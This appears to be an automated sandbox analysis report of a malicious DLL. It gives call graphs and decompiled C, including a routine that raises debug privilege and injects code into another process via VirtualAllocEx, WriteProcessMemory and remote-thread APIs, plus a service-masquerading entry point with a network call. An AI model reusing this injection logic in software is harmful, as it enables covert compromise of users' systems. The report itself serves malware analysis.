TerminateProcess 20897 4656109 20898 4656115 ___BuildCatchObject 20897->20898 20915 4655cc7 20898->20915 20900 465611c 20901 4656149 20900->20901 20902 4656121 ___scrt_is_nonwritable_in_current_image ___BuildCatchObject 20900->20902 20941 465667e IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 20900->20941 20924 4655c2a 20901->20924 20905 4656158 __RTC_Initialize 20905->20902 20927 4655ea1 20905->20927 20909 4656170 20910 4655ea1 2 API calls 20909->20910 20911 465617c ___scrt_initialize_default_local_stdio_options 20910->20911 20931 4661678 20911->20931 20913 4656192 20913->20902 20935 466161c 20913->20935 20916 4655cd0 20915->20916 20942 46564ca IsProcessorFeaturePresent 20916->20942 20918 4655ce5 20918->20900 20919 4655cdc 20919->20918 20943 46615d3 20919->20943 20922 4655cf2 ___vcrt_uninitialize 20922->20918 20923 4655cfc 20923->20900 20958 4655d00 20924->20958 20926 4655c31 20926->20905 20964 4655e66 20927->20964 20930 46568a7 RtlInitializeSListHead 20930->20909 20933 466168f 20931->20933 20932 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20934 46616b9 20932->20934 20933->20932 20934->20913 20936 4661667 20935->20936 20937 466164b 20935->20937 20938 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20936->20938 20937->20936 20972 4631050 20937->20972 20939 4661674 20938->20939 20939->20902 20941->20901 20942->20919 20946 466a907 20943->20946 20949 466a920 20946->20949 20948 4655cee 20948->20922 20948->20923 20950 4655afe 20949->20950 20951 4655b07 20950->20951 20952 4655b09 IsProcessorFeaturePresent 20950->20952 20951->20948 20954 4655ef2 20952->20954 20957 4655eb6 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20954->20957 20956 4655fd5 20956->20948 20957->20956 20959 4655d0e 20958->20959 20962 4655d13 ___scrt_initialize_onexit_tables ___scrt_release_startup_lock 20958->20962 20959->20962 20963 465667e IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 20959->20963 20961 4655d96 20962->20926 20963->20961 20965 4655e83 20964->20965 20966 4655e8a 20964->20966 20970 466144b RtlEnterCriticalSection RtlLeaveCriticalSection __onexit 20965->20970 20971 46614bb RtlEnterCriticalSection RtlLeaveCriticalSection __onexit 20966->20971 20969 4655e88 20969->20930 20970->20969 20971->20969 20979 4671860 20972->20979 20974 4631068 WSAStartup 20975 4655ea1 RtlEnterCriticalSection RtlLeaveCriticalSection 20974->20975 20976 4631083 20975->20976 20977 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20976->20977 20978 4631093 20977->20978 20978->20937 21407 4639510 78 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21504 4639f10 15 API calls 2 library calls 21505 4642f10 CreateThread CloseHandle 21275 466a719 GetStartupInfoW 21276 466a736 21275->21276 21278 466a7c8 21275->21278 21276->21278 21281 466ce02 21276->21281 21279 466a75f 21279->21278 21280 466a78d GetFileType 21279->21280 21280->21279 21282 466ce0e ___BuildCatchObject 21281->21282 21283 466ce32 21282->21283 21284 466ce1b 21282->21284 21294 4668ef7 RtlEnterCriticalSection 21283->21294 21302 4661772 20 API calls _free 21284->21302 21287 466ce20 21303 465eee6 26 API calls __cftof 21287->21303 21289 466ce2a ___BuildCatchObject 21289->21279 21290 466ce6a 21304 466ce91 RtlLeaveCriticalSection _abort 21290->21304 21292 466ce3e 21292->21290 21295 466cd53 21292->21295 21294->21292 21305 4668535 21295->21305 21297 466cd65 21301 466cd72 21297->21301 21312 4669220 11 API calls 2 library calls 21297->21312 21300 466cdc4 21300->21292 21313 46684ad 20 API calls _free 21301->21313 21302->21287 21303->21289 21304->21289 21310 4668542 _GetRangeOfTrysToCheck 21305->21310 21306 4668582 21315 4661772 20 API calls _free 21306->21315 21307 466856d RtlAllocateHeap 21308 4668580 21307->21308 21307->21310 21308->21297 21310->21306 21310->21307 21314 46609ac 7 API calls 2 library calls 21310->21314 21312->21297 21313->21300 21314->21310 21315->21308 21408 4671de4 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21409 46419e0 DestroyCursor 21411 466f1e2 8 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21413 46321f0 waveOutWrite waveOutGetNumDevs waveOutOpen waveOutPrepareHeader SetEvent 21414 463edf0 59 API calls 2 library calls 21506 46367f0 CloseDesktop DeleteDC ReleaseDC CloseHandle 21507 4639fc0 ShellExecuteW 21418 46451c0 14 API calls 3 library calls 21421 466cdcd 21 API calls _free 21422 464e9d0 11 API calls 21508 464ffd0 42 API calls 21423 46535a0 61 API calls 21424 46525a0 71 API calls 21427 46399b0 79 API calls 21509 4652fb0 timeGetTime 20892 46563be 20893 46563c7 20892->20893 20894 46563cc dllmain_dispatch 20892->20894 20896 465680b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 20893->20896 20896->20894 21511 4667fbb 40 API calls __cftof 21430 463fd80 30 API calls 21431 463a980 36 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21434 464f190 38 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21514 464d790 147 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21515 4652f90 31 API calls 21516 4631f95 57 API calls 21517 466ef9f 39 API calls _GetRangeOfTrysToCheck 21518 4633799 27 API calls

                                                            Control-flow Graph

                                                            C-Code - Quality: 91%
                                                            			E0464C460(void* __ebx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				short _v528;
                                                            				long _v532;
                                                            				signed int _t15;
                                                            				int _t23;
                                                            				signed int _t24;
                                                            				void* _t26;
                                                            				void* _t28;
                                                            				signed int _t38;
                                                            				signed int _t41;
                                                            				signed int _t42;
                                                            				void* _t75;
                                                            				signed int _t77;
                                                            				WCHAR* _t80;
                                                            				void* _t82;
                                                            				signed int _t83;
                                                            				void* _t84;
                                                            				signed int _t86;
                                                            
                                                            				_t15 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t15 ^ _t86;
                                                            				_t80 = GetCommandLineW();
                                                            				GetModuleFileNameW(0,  &_v528, 0x104);
                                                            				_t23 = lstrcmpiW(E0465D9BE( &_v528, 0x5c) + 2, L"svchost.exe"); // executed
                                                            				if(_t23 != 0) {
                                                            					_t24 = L0464ABF0();
                                                            					__eflags = _t24;
                                                            					if(_t24 != 0) {
                                                            						E0464C250(__ebx, _t80, __edi, _t80); // executed
                                                            					} else {
                                                            						_t82 = CreateThread(0, 0, E0464B5F0, 0, 0,  &_v532);
                                                            						WaitForSingleObject(_t82, 0xffffffff);
                                                            						CloseHandle(_t82);
                                                            					}
                                                            					_t26 = InternetOpenW(L"Mozilla/4.0 (compatible)", 0, 0, 0, 0); // executed
                                                            					_t75 = _t26;
                                                            					__eflags = _t75;
                                                            					if(_t75 == 0) {
                                                            						goto L19;
                                                            					} else {
                                                            						_t28 = InternetOpenUrlW(_t75, 0x46865fc, 0, 0, 0x80000000, 0);
                                                            						__eflags = _t28;
                                                            						if(_t28 != 0) {
                                                            							InternetCloseHandle(_t28);
                                                            							InternetCloseHandle(_t75);
                                                            							goto L19;
                                                            						} else {
                                                            							InternetCloseHandle(_t75);
                                                            							__eflags = _v8 ^ _t86;
                                                            							return E04655AFE(_v8 ^ _t86);
                                                            						}
                                                            					}
                                                            				} else {
                                                            					if(StrStrIW(_t80, L"netsvcs") == 0) {
                                                            						_t38 = StrStrIW(_t80, L"WspService");
                                                            						__eflags = _t38;
                                                            						if(_t38 == 0) {
                                                            							__eflags = StrStrIW(_t80, L"AppService");
                                                            							if(__eflags == 0) {
                                                            								L19:
                                                            								__eflags = _v8 ^ _t86;
                                                            								return E04655AFE(_v8 ^ _t86);
                                                            							} else {
                                                            								_v532 = 0;
                                                            								_t77 = E04649620(__ebx,  &_v532, StrStrIW, _t80, __eflags);
                                                            								__eflags = _t77;
                                                            								if(_t77 == 0) {
                                                            									goto L19;
                                                            								} else {
                                                            									_t83 = _v532;
                                                            									__eflags = _t83;
                                                            									if(_t83 == 0) {
                                                            										goto L19;
                                                            									} else {
                                                            										_t41 = E0464BD60(__ebx, _t77, _t83, _t77, _t83);
                                                            										__eflags = _t41;
                                                            										if(_t41 > 0) {
                                                            											goto L19;
                                                            										} else {
                                                            											_push(__ebx);
                                                            											do {
                                                            												Sleep(0x3e8);
                                                            												_t42 = E0464BD60(Sleep, _t77, _t83, _t77, _t83);
                                                            												__eflags = _t42;
                                                            											} while (_t42 <= 0);
                                                            											__eflags = _v8 ^ _t86;
                                                            											return E04655AFE(_v8 ^ _t86);
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						} else {
                                                            							_t84 = CreateThread(0, 0, E0464B5F0, 0, 0,  &_v532);
                                                            							WaitForSingleObject(_t84, 0xffffffff);
                                                            							CloseHandle(_t84);
                                                            							__eflags = _v8 ^ _t86;
                                                            							return E04655AFE(_v8 ^ _t86);
                                                            						}
                                                            					} else {
                                                            						CloseHandle(CreateThread(0, 0, 0x464ab30, 0, 0, 0));
                                                            						CloseHandle(CreateThread(0, 0, E04649E60, 0, 0,  &_v532));
                                                            						return E04655AFE(_v8 ^ _t86);
                                                            					}
                                                            				}
                                                            			}





















                                                            0x0464c469
                                                            0x0464c470
                                                            0x0464c47b
                                                            0x0464c48b
                                                            0x0464c4ab
                                                            0x0464c4b3
                                                            0x0464c5d6
                                                            0x0464c5db
                                                            0x0464c5dd
                                                            0x0464c60f
                                                            0x0464c5df
                                                            0x0464c5f9
                                                            0x0464c5fe
                                                            0x0464c605
                                                            0x0464c605
                                                            0x0464c621
                                                            0x0464c627
                                                            0x0464c629
                                                            0x0464c62b
                                                            0x00000000
                                                            0x0464c62d
                                                            0x0464c63e
                                                            0x0464c644
                                                            0x0464c646
                                                            0x0464c666
                                                            0x0464c669
                                                            0x00000000
                                                            0x0464c648
                                                            0x0464c649
                                                            0x0464c654
                                                            0x0464c65e
                                                            0x0464c65e
                                                            0x0464c646
                                                            0x0464c4b9
                                                            0x0464c4c9
                                                            0x0464c51a
                                                            0x0464c51c
                                                            0x0464c51e
                                                            0x0464c564
                                                            0x0464c566
                                                            0x0464c66b
                                                            0x0464c66f
                                                            0x0464c67a
                                                            0x0464c56c
                                                            0x0464c572
                                                            0x0464c581
                                                            0x0464c583
                                                            0x0464c585
                                                            0x00000000
                                                            0x0464c58b
                                                            0x0464c58b
                                                            0x0464c591
                                                            0x0464c593
                                                            0x00000000
                                                            0x0464c599
                                                            0x0464c59d
                                                            0x0464c5a2
                                                            0x0464c5a4
                                                            0x00000000
                                                            0x0464c5aa
                                                            0x0464c5aa
                                                            0x0464c5b1
                                                            0x0464c5b6
                                                            0x0464c5bc
                                                            0x0464c5c1
                                                            0x0464c5c1
                                                            0x0464c5cb
                                                            0x0464c5d5
                                                            0x0464c5d5
                                                            0x0464c5a4
                                                            0x0464c593
                                                            0x0464c585
                                                            0x0464c520
                                                            0x0464c53a
                                                            0x0464c53f
                                                            0x0464c546
                                                            0x0464c551
                                                            0x0464c55b
                                                            0x0464c55b
                                                            0x0464c4cb
                                                            0x0464c4e9
                                                            0x0464c502
                                                            0x0464c513
                                                            0x0464c513
                                                            0x0464c4c9

                                                            APIs
                                                            • GetCommandLineW.KERNEL32(00000001,00000000), ref: 0464C475
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0464C48B
                                                            • lstrcmpiW.KERNEL32(-00000002,svchost.exe), ref: 0464C4AB
                                                            • StrStrIW.SHLWAPI(00000000,netsvcs), ref: 0464C4C5
                                                            • CreateThread.KERNEL32(00000000,00000000,0464AB30,00000000,00000000,00000000), ref: 0464C4E0
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464C4E9
                                                            • CreateThread.KERNEL32(00000000,00000000,04649E60,00000000,00000000,?), ref: 0464C4FF
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464C502
                                                            • StrStrIW.SHLWAPI(00000000,WspService), ref: 0464C51A
                                                            • CreateThread.KERNEL32(00000000,00000000,0464B5F0,00000000,00000000,?), ref: 0464C534
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0464C53F
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464C546
                                                            • CreateThread.KERNEL32(00000000,00000000,0464B5F0,00000000,00000000,?), ref: 0464C5F3
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0464C5FE
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464C605
                                                            • InternetOpenW.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 0464C621
                                                            • InternetOpenUrlW.WININET(00000000,046865FC,00000000,00000000,80000000,00000000), ref: 0464C63E
                                                            • InternetCloseHandle.WININET(00000000), ref: 0464C649
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$CreateThread$Internet$ObjectOpenSingleWait$CommandFileLineModuleNamelstrcmpi
                                                            • String ID: AppService$Mozilla/4.0 (compatible)$WspService$netsvcs$svchost.exe
                                                            • API String ID: 2591637205-2775505531
                                                            • Opcode ID: bd1cd32e64750cad2c53e51452c18459c1e5b58393a284288f14f153a27abd7a
                                                            • Instruction ID: 3903e9418c3a8597cfee83632a27eb61502784577f980e6f27551cad5ecb4023
                                                            • Opcode Fuzzy Hash: bd1cd32e64750cad2c53e51452c18459c1e5b58393a284288f14f153a27abd7a
                                                            • Instruction Fuzzy Hash: 9C51D731781218BBEF24AB64AC4DFBE7368DF94B11F151159FA05E62C0FFA4BD018A58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 66 4649000-4649043 LoadLibraryA GetProcAddress 67 464922f-4649236 call 464ad30 66->67 68 4649049-4649058 RtlAdjustPrivilege 66->68 70 464923c-464924f call 4655afe 67->70 71 464905e-4649070 OpenProcess 67->71 68->70 68->71 71->70 74 4649076-464907d call 4645960 71->74 78 4649250-4649269 VirtualAllocEx 74->78 79 4649083-46490a0 LoadLibraryA GetProcAddress 74->79 82 4649370-464938c CloseHandle call 4655afe 78->82 83 464926f-4649283 WriteProcessMemory 78->83 80 46490a2-46490a7 79->80 81 46490aa-46490af 79->81 80->81 81->78 84 46490b5-46490d0 call 4648c60 81->84 85 4649362-464936a VirtualFreeEx 83->85 86 4649289-464928d 83->86 84->82 93 46490d6-46490ee call 4648ec0 84->93 85->82 86->85 89 4649293-464929a call 4645c40 86->89 96 46492b7-46492d0 LoadLibraryA GetProcAddress 89->96 97 464929c-46492ad CreateRemoteThread 89->97 105 46490f4-46490f8 93->105 106 4649218-464922a call 4648d90 93->106 101 46492d2-46492f7 96->101 102 46492f9-464931a LoadLibraryA GetProcAddress 96->102 99 4649345-4649356 WaitForSingleObject 97->99 100 46492b3 97->100 108 464935e 99->108 100->96 101->99 101->102 103 464931c-4649338 102->103 104 464933b-4649343 102->104 103->104 104->99 104->108 105->106 110 46490fe-4649126 call 4648390 call 4648b90 105->110 106->82 108->85 117 4649128-4649174 call 46481b0 110->117 118 464917a-46491a2 call 4648390 call 4648b90 110->118 117->118 123 46491fc-4649210 WaitForSingleObject FindCloseChangeNotification 117->123 118->106 126 46491a4-46491fa call 46481b0 118->126 123->106 126->106 126->123
                                                            C-Code - Quality: 50%
                                                            			E04649000(void* __ebx, long __ecx, void* __edx, void* __edi, void* __esi, long _a4) {
                                                            				signed int _v8;
                                                            				char _v28;
                                                            				char _v32;
                                                            				long _v36;
                                                            				void* _v40;
                                                            				signed int _v44;
                                                            				void* _v48;
                                                            				void* _v52;
                                                            				void* _v92;
                                                            				signed int _t52;
                                                            				void* _t60;
                                                            				struct _SECURITY_ATTRIBUTES* _t68;
                                                            				_Unknown_base(*)()* _t70;
                                                            				_Unknown_base(*)()* _t72;
                                                            				void* _t73;
                                                            				_Unknown_base(*)()* _t81;
                                                            				signed int _t83;
                                                            				void* _t84;
                                                            				signed int _t87;
                                                            				signed int _t89;
                                                            				void* _t93;
                                                            				long _t102;
                                                            				long _t104;
                                                            				signed int _t118;
                                                            				signed int _t127;
                                                            				signed int _t128;
                                                            				void* _t133;
                                                            				void* _t135;
                                                            				signed int _t136;
                                                            				long _t138;
                                                            				void* _t139;
                                                            				signed int _t142;
                                                            				signed int _t144;
                                                            				void* _t146;
                                                            				void* _t147;
                                                            
                                                            				_t144 = (_t142 & 0xfffffff8) - 0x34;
                                                            				_t52 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t52 ^ _t144;
                                                            				_push(__ebx);
                                                            				_t104 = _a4;
                                                            				_push(__esi);
                                                            				_push(__edi);
                                                            				_t138 = __ecx;
                                                            				_v52 = __edx;
                                                            				_v32 = 0;
                                                            				if(GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlAdjustPrivilege") == 0) {
                                                            					if(E0464AD30(_t138) != 0) {
                                                            						goto L2;
                                                            					} else {
                                                            						goto L17;
                                                            					}
                                                            				} else {
                                                            					_t102 = RtlAdjustPrivilege(0x14, 1, 0,  &_v36); // executed
                                                            					if(_t102 < 0) {
                                                            						L17:
                                                            						return E04655AFE(_v8 ^ _t144);
                                                            					} else {
                                                            						L2:
                                                            						_t139 = OpenProcess(0x43a, 0, _t138);
                                                            						if(_t139 == 0) {
                                                            							goto L17;
                                                            						} else {
                                                            							_t60 = E04645960(); // executed
                                                            							if(_t60 == 0) {
                                                            								L18:
                                                            								_t133 = VirtualAllocEx(_t139, 0, _t104, 0x3000, 0x40);
                                                            								_v44 = _t133;
                                                            								if(_t133 != 0) {
                                                            									if(WriteProcessMemory(_t139, _t133, _v52, _t104,  &_v36) != 0 && _v36 == _t104) {
                                                            										_t68 = E04645C40(_t133);
                                                            										if(_t68 != 0) {
                                                            											L24:
                                                            											_t70 = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlCreateUserThread");
                                                            											if(_t70 == 0) {
                                                            												L26:
                                                            												_v48 = 0;
                                                            												_t72 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtCreateThreadEx");
                                                            												if(_t72 != 0) {
                                                            													 *_t72( &_v48, 0x1fffff, 0, _t139, _v44, 0, 0, 0, 0, 0, 0);
                                                            												}
                                                            												_t73 = _v48;
                                                            												_t135 = _t73;
                                                            												if(_t73 != 0) {
                                                            													goto L29;
                                                            												}
                                                            											} else {
                                                            												_v52 = 0;
                                                            												 *_t70(_t139, 0, 0, 0, 0, 0, _t133, 0,  &_v52, 0);
                                                            												_t135 = _v92;
                                                            												if(_t135 != 0) {
                                                            													goto L29;
                                                            												} else {
                                                            													goto L26;
                                                            												}
                                                            											}
                                                            										} else {
                                                            											_t135 = CreateRemoteThread(_t139, _t68, _t68, _t133, _t68, _t68, _t68);
                                                            											if(_t135 != 0) {
                                                            												L29:
                                                            												WaitForSingleObject(_t135, 0xffffffff);
                                                            												CloseHandle(_t135);
                                                            												_v36 = 1;
                                                            											} else {
                                                            												_t133 = _v48;
                                                            												goto L24;
                                                            											}
                                                            										}
                                                            										_t133 = _v44;
                                                            									}
                                                            									VirtualFreeEx(_t139, _t133, _t104, 0x4000);
                                                            								}
                                                            							} else {
                                                            								_v48 = 0;
                                                            								_t81 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                            								if(_t81 != 0) {
                                                            									 *_t81(_t139,  &_v48);
                                                            								}
                                                            								if(_v48 != 0) {
                                                            									goto L18;
                                                            								} else {
                                                            									_t127 = _t104;
                                                            									_t136 = E04648C60(_t139, _t127);
                                                            									_t144 = _t144 - 0x10 + 0x10;
                                                            									_t83 = _t127;
                                                            									_v44 = _t83;
                                                            									if((_t136 | _t83) != 0) {
                                                            										_t128 = _v52;
                                                            										_t118 = _t139;
                                                            										_t84 = E04648EC0(_t118, _t128, _t136, _t83, _t104,  &_v40);
                                                            										_t146 = _t144 + 0x10;
                                                            										if(_t84 != 0 && _v40 == _t104) {
                                                            											_v48 = 0;
                                                            											_t87 = L04648B90(_t104, "RtlCreateUserThread", _t128, _t136, _t139, L04648390(_t118), _t128);
                                                            											_v40 = _t87;
                                                            											_t147 = _t146 + 8;
                                                            											_v52 = _t128;
                                                            											_t118 = _t87 | _t128;
                                                            											if(_t118 == 0) {
                                                            												L12:
                                                            												_v40 = 0;
                                                            												_t89 = L04648B90(_t104, "NtCreateThreadEx", _t128, _t136, _t139, L04648390(_t118), _t128);
                                                            												_v36 = _t89;
                                                            												_t146 = _t147 + 8;
                                                            												_v52 = _t128;
                                                            												_t118 = _t89 | _t128;
                                                            												if(_t118 != 0) {
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(_v44);
                                                            													_push(_t136);
                                                            													asm("cdq");
                                                            													_push(_t128);
                                                            													_push(_t139);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													asm("cdq");
                                                            													E046481B0(_v36, _v52, 0xb,  &_v40, _t128, 0x1fffff);
                                                            													_t93 = _v40;
                                                            													_t146 = _t146 + 0x64;
                                                            													_v52 = _t93;
                                                            													if(_t93 != 0) {
                                                            														goto L14;
                                                            													}
                                                            												}
                                                            											} else {
                                                            												asm("cdq");
                                                            												_push(_t128);
                                                            												_push( &_v28);
                                                            												asm("cdq");
                                                            												_push(_t128);
                                                            												_push( &_v48);
                                                            												_push(0);
                                                            												_push(0);
                                                            												_push(_v44);
                                                            												_push(_t136);
                                                            												_push(0);
                                                            												_push(0);
                                                            												_push(0);
                                                            												_push(0);
                                                            												_push(0);
                                                            												_push(0);
                                                            												_push(0);
                                                            												_push(0);
                                                            												_push(0);
                                                            												asm("cdq");
                                                            												E046481B0(_v40, _v52, 0xa, _t139, _t128, 0);
                                                            												_t93 = _v48;
                                                            												_t146 = _t147 + 0x5c;
                                                            												_v52 = _t93;
                                                            												if(_t93 != 0) {
                                                            													L14:
                                                            													WaitForSingleObject(_t93, 0xffffffff);
                                                            													FindCloseChangeNotification(_v52); // executed
                                                            													_v32 = 1;
                                                            												} else {
                                                            													goto L12;
                                                            												}
                                                            											}
                                                            										}
                                                            										_push(_t118);
                                                            										E04648D90(_t139, _t104, _t136, _v44);
                                                            										_t144 = _t146 + 0xc;
                                                            									}
                                                            								}
                                                            							}
                                                            							CloseHandle(_t139);
                                                            							return E04655AFE(_v8 ^ _t144);
                                                            						}
                                                            					}
                                                            				}
                                                            			}






































                                                            0x04649006
                                                            0x04649009
                                                            0x04649010
                                                            0x04649014
                                                            0x04649015
                                                            0x04649018
                                                            0x04649019
                                                            0x04649020
                                                            0x04649027
                                                            0x0464902b
                                                            0x04649043
                                                            0x04649236
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04649049
                                                            0x04649054
                                                            0x04649058
                                                            0x0464923c
                                                            0x0464924f
                                                            0x0464905e
                                                            0x0464905e
                                                            0x0464906c
                                                            0x04649070
                                                            0x00000000
                                                            0x04649076
                                                            0x04649076
                                                            0x0464907d
                                                            0x04649250
                                                            0x04649261
                                                            0x04649263
                                                            0x04649269
                                                            0x04649283
                                                            0x04649293
                                                            0x0464929a
                                                            0x046492b7
                                                            0x046492c8
                                                            0x046492d0
                                                            0x046492f9
                                                            0x04649303
                                                            0x04649312
                                                            0x0464931a
                                                            0x04649339
                                                            0x04649339
                                                            0x0464933b
                                                            0x0464933f
                                                            0x04649343
                                                            0x00000000
                                                            0x00000000
                                                            0x046492d2
                                                            0x046492d8
                                                            0x046492ef
                                                            0x046492f1
                                                            0x046492f7
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x046492f7
                                                            0x0464929c
                                                            0x046492a9
                                                            0x046492ad
                                                            0x04649345
                                                            0x04649348
                                                            0x04649354
                                                            0x04649356
                                                            0x046492b3
                                                            0x046492b3
                                                            0x00000000
                                                            0x046492b3
                                                            0x046492ad
                                                            0x0464935e
                                                            0x0464935e
                                                            0x0464936a
                                                            0x0464936a
                                                            0x04649083
                                                            0x0464908d
                                                            0x04649098
                                                            0x046490a0
                                                            0x046490a8
                                                            0x046490a8
                                                            0x046490af
                                                            0x00000000
                                                            0x046490b5
                                                            0x046490b8
                                                            0x046490c1
                                                            0x046490c3
                                                            0x046490c6
                                                            0x046490cc
                                                            0x046490d0
                                                            0x046490d6
                                                            0x046490e2
                                                            0x046490e4
                                                            0x046490e9
                                                            0x046490ee
                                                            0x046490fe
                                                            0x04649112
                                                            0x04649119
                                                            0x0464911d
                                                            0x04649120
                                                            0x04649124
                                                            0x04649126
                                                            0x0464917a
                                                            0x0464917a
                                                            0x0464918e
                                                            0x04649195
                                                            0x04649199
                                                            0x0464919c
                                                            0x046491a0
                                                            0x046491a2
                                                            0x046491a4
                                                            0x046491a6
                                                            0x046491a8
                                                            0x046491aa
                                                            0x046491ac
                                                            0x046491ae
                                                            0x046491b0
                                                            0x046491b2
                                                            0x046491b4
                                                            0x046491b6
                                                            0x046491b8
                                                            0x046491ba
                                                            0x046491bc
                                                            0x046491c2
                                                            0x046491c3
                                                            0x046491c4
                                                            0x046491c5
                                                            0x046491c6
                                                            0x046491c8
                                                            0x046491ca
                                                            0x046491d5
                                                            0x046491e5
                                                            0x046491ea
                                                            0x046491f1
                                                            0x046491f4
                                                            0x046491fa
                                                            0x00000000
                                                            0x00000000
                                                            0x046491fa
                                                            0x04649128
                                                            0x0464912c
                                                            0x0464912d
                                                            0x0464912e
                                                            0x04649133
                                                            0x04649134
                                                            0x04649135
                                                            0x04649136
                                                            0x04649138
                                                            0x0464913a
                                                            0x04649140
                                                            0x04649141
                                                            0x04649143
                                                            0x04649145
                                                            0x04649147
                                                            0x04649149
                                                            0x0464914b
                                                            0x0464914d
                                                            0x0464914f
                                                            0x04649151
                                                            0x04649155
                                                            0x04649162
                                                            0x04649167
                                                            0x0464916b
                                                            0x0464916e
                                                            0x04649174
                                                            0x046491fc
                                                            0x046491ff
                                                            0x0464920e
                                                            0x04649210
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04649174
                                                            0x04649126
                                                            0x04649218
                                                            0x04649222
                                                            0x04649227
                                                            0x04649227
                                                            0x046490d0
                                                            0x046490af
                                                            0x04649371
                                                            0x0464938c
                                                            0x0464938c
                                                            0x04649070
                                                            0x04649058

                                                            APIs
                                                            • LoadLibraryA.KERNEL32 ref: 04649033
                                                            • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 0464903B
                                                            • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 04649054
                                                            • OpenProcess.KERNEL32(0000043A,00000000,?), ref: 04649066
                                                              • Part of subcall function 04645960: LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,0464C36B), ref: 04645970
                                                              • Part of subcall function 04645960: GetProcAddress.KERNEL32(00000000), ref: 04645977
                                                              • Part of subcall function 04645960: GetNativeSystemInfo.KERNEL32(?), ref: 04645997
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04649095
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04649098
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 046491FF
                                                            • FindCloseChangeNotification.KERNEL32(?), ref: 0464920E
                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,0464BFF5,00003000,00000040), ref: 0464925B
                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,0464BFF5,?), ref: 0464927B
                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 046492A3
                                                            • LoadLibraryA.KERNEL32(ntdll.dll,RtlCreateUserThread), ref: 046492C1
                                                            • GetProcAddress.KERNEL32(00000000), ref: 046492C8
                                                            • LoadLibraryA.KERNEL32(ntdll.dll,NtCreateThreadEx), ref: 0464930B
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04649312
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04649348
                                                            • VirtualFreeEx.KERNEL32(00000000,00000000,0464BFF5,00004000), ref: 0464936A
                                                            • CloseHandle.KERNEL32(00000000), ref: 04649371
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc$CloseObjectProcessSingleVirtualWait$AdjustAllocChangeCreateFindFreeHandleInfoMemoryNativeNotificationOpenPrivilegeRemoteSystemThreadWrite
                                                            • String ID: IsWow64Process$NtCreateThreadEx$RtlAdjustPrivilege$RtlCreateUserThread$kernel32.dll$ntdll.dll
                                                            • API String ID: 2461120785-1625205875
